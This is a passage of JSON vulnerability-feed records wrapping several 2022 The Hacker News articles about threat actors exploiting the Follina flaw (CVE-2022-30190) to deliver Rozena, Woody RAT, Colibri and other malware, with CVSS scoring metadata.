["CVE-2022-30190"], "modified": "2022-06-01T10:00:06", "id": "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "href": "https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-22T06:04:11", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgn45Ck6vqDFvA2leDePKdPhlDH1ahczKEX1G7NW9CKxteJGkz3l_Dxpmjd1SnrDkHKguss5We9LWuDgnHlJuns2KL7DwAsl-xMBxv1S1VLDsBEjacQCutkUNEQVeTllKkGd_8PyVCTLk6MOVTWU_e_tEHf4dzp7n647bD1HgoUG5tWMG9ax-DFlaWb/s728-e100/russian-hackers.jpg>)\n\nA threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.\n\nRecorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as [Colibri loader](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and [Warzone RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria>).\n\nThe attacks are said to be an expansion of the [same campaign](<https://cert.gov.ua/article/405538>) that previously distributed [DCRat](<https://thehackernews.com/2022/05/experts-sound-alarm-on-dcrat-backdoor.html>) (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine.\n\nSandworm is a [destructive Russian threat group](<https://thehackernews.com/2020/10/russian-hackers.html>) that's best known for carrying out attacks such as the 2015 and 2016 targeting of Ukrainian electrical grid and 2017's NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency.\n\nThe adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical substations, computers and networking equipment for the third time in Ukraine earlier this April through a [new variant of a piece of malware](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) known as Industroyer.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjXC-uZjCaOE_yV1Ns_wdImLvY7yyJYACWqNQeg20fPXqv5CKuqxWQe7J6SuIaEJEfGFj1kYATlPbZUZfu1WcJ3BKgFQldFDoa_8Ak0IbRePTyHl5roYnEv5BqaJPBWNSFWwm2IRfiLxEPXIK6b1T9KLchmrOrOYDES07WewyUwSgVt1Ma91-35cy2g/s728-e100/link.jpg>)\n\nRussia's invasion of Ukraine has also had the group unleash numerous other attacks, including [leveraging the Follina vulnerability](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to breach media entities in the Eastern European nation.\n\nIn addition, it was uncovered as the mastermind behind a new modular botnet called [Cyclops Blink](<https://thehackernews.com/2022/04/fbi-shut-down-russia-linked-cyclops.html>) that enslaved internet-connected firewall devices and routers from WatchGuard and ASUS.\n\nThe U.S. government, for its part, has announced up to [$10 million in rewards](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) for information on six hackers associated with the APT group for participating in malicious cyber activities against critical infrastructure in the country.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhqC088Qg7YBtg3UXFBJalDCP6mVfxKfvjY5yNkkSnaAzijWLnHr-5hw8ZRAGsRo2kw_2ahBrMMxkklXzZZWQwTk1RdkJ62o6UmJjDK99d2kflQJO76hiDcGt0eVnK9HwdB4v6gYy3p6HhbHfT-i8shyoNIyTsvC0moN0M6dNQGjqFBw-pTH9Rg6yvA/s728-e100/hack.jpg>)\n\n\"A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware,\" Recorded Future [said](<https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine>).\n\nThe attacks entail the fraudulent domains hosting a web page purportedly about \"Odesa Regional Military Administration,\" while an encoded ISO image payload is stealthily deployed via a technique referred to as [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>).\n\nHTML smuggling, as the name goes, is an evasive malware delivery technique that leverages legitimate HTML and JavaScript features to distribute malware and get around conventional security controls.\n\nRecorded Future also said it identified points of similarities with another [HTML dropper attachment](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) put to use by the APT29 threat actor in a campaign aimed at Western diplomatic missions between May and June 2022.\n\nEmbedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine.\n\nThe execution of the LNK file also launches an innocuous decoy document \u2013 an application for Ukrainian citizens to request for monetary compensation and fuel discounts \u2013 in an attempt to conceal the malicious operations.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-20T12:56:00", "type": "thn", "title": "Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-22T06:02:31", "id": "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "href": "https://thehackernews.com/2022/09/russian-sandworm-hackers-impersonate.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T03:58:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgqkZlda0c2g2igRLTOdrEftzHnVaYPBW5GyWFxmq2gYpwQJC85xMudeBpTILNLmjRqpCEQzJ1BHrUDtlNVaYEIjBIszT-yfr5cd_4eB48Ayxqg8tZogsoHViYpX26Bhq8NdJI9qMvqSr-H6uCMSDiHFlPWqQDWupWrWorWtPcyR3TFN-oXdcQihirY/s728-e100/hacking.jpg>)\n\nA newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor on Windows systems.\n\n\"Rozena is a backdoor malware that is capable of injecting a remote shell connection back to the attacker's machine,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor>) in a report this week.\n\nTracked as [CVE-2022-30190](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>), the now-patched Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability has come under heavy exploitation in recent weeks ever since it came to light in late May 2022.\n\nThe starting point for the latest attack chain observed by Fortinet is a weaponized [Office document](<https://www.virustotal.com/gui/file/432bae48edf446539cae5e20623c39507ad65e21cb757fb514aba635d3ae67d6/details>) that, when opened, connects to a [Discord CDN URL](<https://thehackernews.com/2021/04/alert-theres-new-malware-out-there.html>) to retrieve an HTML file (\"[index.htm](<https://www.virustotal.com/gui/file/3558840ffbc81839a5923ed2b675c1970cdd7c9e0036a91a0a728af14f80eff3/details>)\") that, in turn, invokes the diagnostic utility using a PowerShell command to download next-stage payloads from the same CDN attachment space.\n\nThis includes the Rozena implant (\"Word.exe\") and a batch file (\"cd.bat\") that's designed to terminate MSDT processes, establish the backdoor's persistence by means of Windows Registry modification, and download a harmless Word document as a decoy.\n\nThe malware's core function is to inject shellcode that launches a reverse shell to the attacker's host (\"microsofto.duckdns[.]org\"), ultimately allowing the attacker to take control of the system required to monitor and capture information, while also maintaining a backdoor to the compromised system.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjNyfAHkPqncAqB7jBg-H99Da5bf5sDt90p5YIMCVig5r88OcsOiWbgLBm5chCwciSnEGnHkhKHFgCzl9qJf1Ql9z0-jpkW4CI2LK1BIBn1cVtJNPYaa1pzTkmENbZ0p1h3IvCyZFRCzMHMsO22B7F7pxaB5wNSsgFBdDzMX15lBztI2-cZOcLDb0De/s728-e100/hack.jpg>)\n\nThe exploitation of the Follina flaw to distribute malware through malicious Word documents comes as social engineering attacks are [relying](<https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns>) on Microsoft Excel, Windows shortcut (LNK), and ISO image files as droppers to deploy malware such as [Emotet](<https://thehackernews.com/2022/06/new-emotet-variant-stealing-users.html>), [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>), [IcedID](<https://thehackernews.com/2022/04/new-hacking-campaign-targeting.html>), and [Bumblebee](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) to a victim's device.\n\nThe droppers are said to be distributed through emails that contain directly the dropper or a password-protected ZIP as an attachment, an HTML file that extracts the dropper when opened, or a link to download the dropper in the body of the email.\n\nWhile attacks spotted in early April prominently featured Excel files with XLM macros, Microsoft's decision to block macros by default around the same time is said to have forced the threat actors to pivot to alternative methods like [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>) as well as .LNK and .ISO files.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgM-Z0W8o0gQ_-NFu3LEc4vr3-E4xCQdiYnwKGPPpujdLoGmbSycdUIu9d7yXk-CAqmujZXrhriSPIZT6u_fuZ4gl3MdLu9mfa5S7Ax7GXz6vh_OnWC3CgFF05v5790zMvuesJugC_saocqG0c50_NWWevAwBkithkqwummnbyocnsUs1R8mrV9mDAb/s728-e100/hackers.jpg>)\n\nLast month, Cyble disclosed details of a malware tool called [Quantum](<https://thehackernews.com/2022/06/new-quantum-builder-lets-attackers.html>) that's being sold on underground forums so as to equip cybercriminal actors with capabilities to build malicious .LNK and .ISO files.\n\nIt's worth noting that [macros](<https://docs.microsoft.com/en-us/microsoft-365/security/intelligence/macro-malware>) have been a tried-and-tested [attack vector](<https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/>) for adversaries looking to drop ransomware and other malware on Windows systems, whether it be through phishing emails or other means.\n\nMicrosoft has since [temporarily paused](<https://thehackernews.com/2022/07/microsoft-quietly-rolls-back-plan-to.html>) its plans to disable Office macros in files downloaded from the internet, with the company telling The Hacker News that it's taking the time to make \"additional changes to enhance usability.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-09T08:49:00", "type": "thn", "title": "Hackers Exploiting Follina Bug to Deploy Rozena Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-12T03:25:38", "id": "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "href": "https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T05:56:38", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiwTkerV_vHTBX6raliukL7HMmC-07MaqMLisxHNJsLFg2u_5hzd4ZSaJnJFMLEm0SVlgLnMNI92Aa_h88r1yM_IGDxGstGOjGOIKVBGqorBSAAMipARKlu8r3LBRAsgA8eMxIOakvY7qqrCIOl1eaoGiXrTVXgPmcTvvLkPjETYV958M7PhFiGwY3e/s728-e100/hacking.jpg>)\n\nAn unofficial security patch has been made available for a new Windows zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), even as the Follina flaw continues to be exploited in the wild.\n\nThe issue \u2014 referenced as **DogWalk** \u2014 relates to a path traversal flaw that can be exploited to stash a malicious executable file to the Windows Startup folder when a potential target opens a specially crafted \".diagcab\" archive file that contains a diagnostics configuration file.\n\nThe idea is that the payload would get executed the next time the victim logs in to the system after a restart. The vulnerability affects all Windows versions, starting from Windows 7 and Server Server 2008 to the latest releases.\n\nDogWalk was originally [disclosed](<https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd>) by security researcher Imre Rad in January 2020 after Microsoft, having acknowledged the problem, deemed it as not a security issue.\n\n\"There are a number of file types that can execute code in such a way but aren't technically 'executables,'\" the tech giant said at the time. \"And a number of these are considered unsafe for users to download/receive in email, even '.diagcab' is blocked by default in Outlook on the web and other places.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwRgjGLI9aF8GGCJ21kc1Qb8R_OxNcdWLs-zRvaLoVcCrG09nD-xcOfE8LIElgnsXnfWznza6qP97ZirQ6SfMXCGN0TFK9XKjmm1Vl68Atu0RGUgpXh9rJ3kygy6lvLlR0bWkN0HolGLD7oh2TXsGE81KbEmYzDcLwQNm8sC0yQCVCw6UvA8jyuVrF/s728-e100/windows.gif>)\n\nWhile all files downloaded and received via email include a Mark-of-the-Web ([MOTW](<https://attack.mitre.org/techniques/T1553/005/>)) tag that's used to determine their origin and trigger an appropriate security response, 0patch's Mitja Kolsek noted that the MSDT application is not designed to check this flag and hence allows the .diagcab file to be opened without warning.\n\n\"Outlook is not the only delivery vehicle: such file is cheerfully downloaded by all major browsers including Microsoft Edge by simply visiting(!) a website, and it only takes a single click (or mis-click) in the browser's downloads list to have it opened,\" Kolsek [said](<https://blog.0patch.com/2022/06/microsoft-diagnostic-tools-dogwalk.html>).\n\n\"No warning is shown in the process, in contrast to downloading and opening any other known file capable of executing [the] attacker's code.\"\n\nThe patches and the [renewed interest](<https://twitter.com/j00sean/status/1532416426702786560>) in the zero-day bug follow [active exploitation](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) of the \"[Follina](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>)\" remote code execution vulnerability by leveraging malware-laced Word documents that abuse the \"ms-msdt:\" protocol URI scheme.\n\nAccording to enterprise security firm Proofpoint, the flaw (CVE-2022-30190, CVSS score: 7.8) is being weaponized by a threat actor tracked as [TA570](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to deliver the [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>) (aka Qakbot) information-stealing trojan.\n\n\"Actor uses thread hijacked messages with HTML attachments which, if opened, drop a ZIP archive,\" the company [said](<https://twitter.com/threatinsight/status/1534227444915482625>) in a series of tweets detailing the phishing attacks.\n\n\"Archive contains an IMG with a Word doc, shortcut file, and DLL. The LNK will execute the DLL to start QBot. The doc will load and execute a HTML file containing PowerShell abusing CVE-2022-30190 used to download and execute QBot.\"\n\nQBot has also been employed by [initial access brokers](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to gain initial access to target networks, enabling ransomware affiliates to [abuse the foothold](<https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/>) to deploy file-encrypting malware.\n\nThe DFIR Report, earlier this year, also [documented](<https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/>) how QBot infections move at a rapid pace, enabling the malware to harvest browser data and Outlook emails a mere 30 minutes after initial access and propagate the payload to an adjacent workstation around the 50-minute mark.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T14:24:00", "type": "thn", "title": "Researchers Warn of Unpatched \"DogWalk\" Microsoft Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T05:26:49", "id": "THN:A24E3ECC17FDA35932981ED1D0B9B351", "href": "https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T05:59:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEijZhKuLa-lQHOTya-LumppJRRe0-K5ZkrokQP6YCJulItM735L7x2VxidGSY3UAUweDYOrlUCjOSZOqKHcBnPJbUkrWJp74sfTiaR4x0D78nMuUhWticD0LtHFKvf1LGsYs6Cb9YnIJTJZwZygzO7MpLe49vP_YZwGnsgl_Jl9cnJRwT5-2Ahq8hf0/s728-e100/rat.jpg>)\n\nAn unknown threat actor has been targeting Russian entities with a newly discovered remote access trojan called **Woody RAT** for at least a year as part of a spear-phishing campaign.\n\nThe advanced custom backdoor is said to be delivered via either of two methods: archive files or Microsoft Office documents leveraging the now-patched \"Follina\" support diagnostic tool vulnerability ([CVE-2022-30190](<https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html>)) in Windows.\n\nLike other implants engineered for espionage-oriented operations, Woody RAT sports a wide range of features that enables the threat actor to remotely commandeer and steal sensitive information from the infected systems.\n\n\"The earliest versions of this RAT were typically archived into a ZIP file pretending to be a document specific to a Russian group,\" Malwarebytes researchers Ankur Saini and Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) in a Wednesday report.\n\n\"When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload.\"\n\nIn one instance, the hacking group attempted to strike a Russian aerospace and defense entity known as [OAK](<https://www.uacrussia.ru/en/>) based on evidence gleaned from a fake domain registered for this purpose.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg35LRJ0ayqjEMKo3ADOi7mLoAyI4moDW82GmOQ2AlRyBAr__ZIQMM7vFfzy16TW4_PJDRxTM3MyD7ds52s6eT0XLADE2Hz4UwUUa1dTPqwH82imY_KTeVPstKV8SaH6cUZFOFhzy9sDGaIgyuV67nCpgMjWxG3zJtHwhSLCWzu8TEc3yxib37k2VDO/s728-e100/malware.jpg>)\n\nAttacks leveraging the Windows flaw as part of this campaign first came to light on June 7, 2022, when researchers from the MalwareHunterTeam [disclosed](<https://twitter.com/malwrhunterteam/status/1534184385313923072>) the use of a document named \"\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx\" (which translates to \"Memo.docx\") to deliver a CSS payload containing the trojan.\n\nThe document purportedly offers best security practices for passwords and confidential information, among others, while acting as a decoy for dropping the backdoor.\n\nBesides encrypting its communications with a remote server, Woody RAT is equipped with capabilities to write arbitrary files to the machine, execute additional malware, delete files, enumerate directories, capture screenshots, and gather a list of running processes.\n\nAlso embedded within the malware are two .NET-based libraries named WoodySharpExecutor and WoodyPowerSession that can be used to run .NET code and PowerShell commands received from the server, respectively.\n\nFurthermore, the malware makes use of the [process hollowing technique](<https://attack.mitre.org/techniques/T1055/012/>) to inject itself into a suspended Notepad process and deletes itself from the disk to evade detection from security software installed on the compromised host.\n\nMalwarebytes has yet to attribute the attacks to a specific threat actor, citing lack of solid indicators linking the campaign to a previously known group, although Chinese and North Korean nation-state collectives have targeted Russia in the past.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-04T12:55:00", "type": "thn", "title": "New Woody RAT Malware Being Used to Target Russian Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T05:42:05", "id": "THN:DFB68B1B6C2EFBB410EB54D83320B71C", "href": "https://thehackernews.com/2022/08/new-woody-rat-malware-being-used-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T16:23:01", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgNo0JIZZ2xVs6xWtBDjG87OxZhnIm24TPPfBsB4b1eUH3h75A9m5-rMQtbJNUn997mhuZ9FVOeso_N8_mbXm7xPWkdN_VN9xEC-jz_XOOnSKdgBn0U32ePvsu7MkJ99eVXjBZrFnXBotJEoO7vu7eUykxbIFN-6PnFuHXb16ZuNxWHY26VBO19rhGB/s728-e100/russian-hackers.jpg>)\n\nFormer members of the Conti cybercrime cartel have been implicated in five different campaigns targeting Ukraine from April to August 2022.\n\nThe findings, which come from Google's Threat Analysis Group (TAG), builds upon a [prior report](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) published in July 2022 detailing the [continued cyber activity](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/>) aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war.\n\n\"UAC-0098 is a threat actor that historically delivered the [IcedID banking trojan](<https://thehackernews.com/2022/03/hackers-hijack-email-reply-chains-on.html>), leading to human-operated ransomware attacks,\" TAG researcher Pierre-Marc Bureau [said](<https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/>) in a report shared with The Hacker News.\n\n\"The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations.\"\n\nUAC-0098 is believed to have functioned as an initial access broker for ransomware groups such as Quantum and [Conti](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) (aka FIN12, Gold Ulrick, or Wizard Spider), the former of which was [subsumed by the latter](<https://thehackernews.com/2022/08/conti-cybercrime-cartel-using-bazarcall.html>) in April 2022.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwAToWSwhUxNkqZBnap1saOcSptSsRKdR2PCuiQamQfKMMtK9-B7ynmiF-gdlmDCOj8RDPb54wYwMRwiIXBFKTwDGotN-y7Rlc4SLlXv-jQUmbV7_4igIalD1e_sKbpjs6ZZYEUwsTet-4KSgvQpaxTA0AqjnN7-DuVbePjhJNOznNM8ypuas5E4_D/s728-e100/google-malware.jpg>)\n\nOne of the prominent campaigns undertaken by the group in June 2022 entailed the abuse of [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the Windows operating system to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts in media and critical infrastructure entities.\n\nBut this appears to be a part of a series of attacks that commenced way back in late April 2022, when the group conducted an email phishing campaign to deliver [AnchorMail](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>) (aka LackeyBuilder), a variant of the TrickBot group's AnchorDNS implant that uses SMTP for command-and-control.\n\nSubsequent phishing campaigns distributing IcedID and Cobalt Strike have been directed against Ukrainian organizations, repeatedly striking the hospitality sector, some of which impersonated the National Cyber Police of Ukraine or representatives of Elon Musk and StarLink.\n\nAround mid-May, UAC-0098 is also said to have leveraged a compromised account of a hotel in India to send malware-laced attachments to organizations working in the hospitality industry in Ukraine, before expanding to humanitarian NGOs in Italy.\n\nSimilar attacks have also been observed against entities in the technology, retail, and government sectors, with the IcedID binary concealed as a Microsoft update to trigger the infection. Post-exploitation steps carried out following a successful compromise have not been identified.\n\nUAC-0098 is far from the only Conti-affiliated hacking group to set its sights on Ukraine since the onset of the war. In July 2022, IBM Security X-Force [disclosed](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) that the TrickBot gang orchestrated six different campaigns to systematically target the country with a plethora of malware.\n\n\"UAC-0098 activities are representative examples of blurring lines between financially motivated and government backed groups in Eastern Europe, illustrating a trend of threat actors changing their targeting to align with regional geopolitical interests,\" Bureau said.\n\n\"The group demonstrates strong interest in breaching businesses operating in the hospitality industry of Ukraine, going as far as launching multiple distinct campaigns against the same hotel chains.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-07T14:42:00", "type": "thn", "title": "Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-14T13:52:54", "id": "THN:8C7C0BBCE90D4B2076F46E011BAB609D", "href": "https://thehackernews.com/2022/09/some-members-of-conti-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-07T15:29:02", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTNQLTqzRs1icO7nDf4jqaFdrqEQOglIjZdWwjLdPrfKMRyk55GksD5wNcAuXtq2syUw1ZGchuL7kfSaCip0NcKRKc0tvt4HKsngNfLJLu_wGgxPW6x3UL9JFBm5cSmmq4EorVcffa9KUUO0-_bLx-vTe857ciAdVTPSOFQ_XHk1j7o3-Tuau9QxI9/s728-e100/russian-hackers.jpg>)\n\nThe Computer Emergency Response Team of Ukraine (CERT-UA) has [cautioned](<https://cert.gov.ua/article/341128>) of a new set of 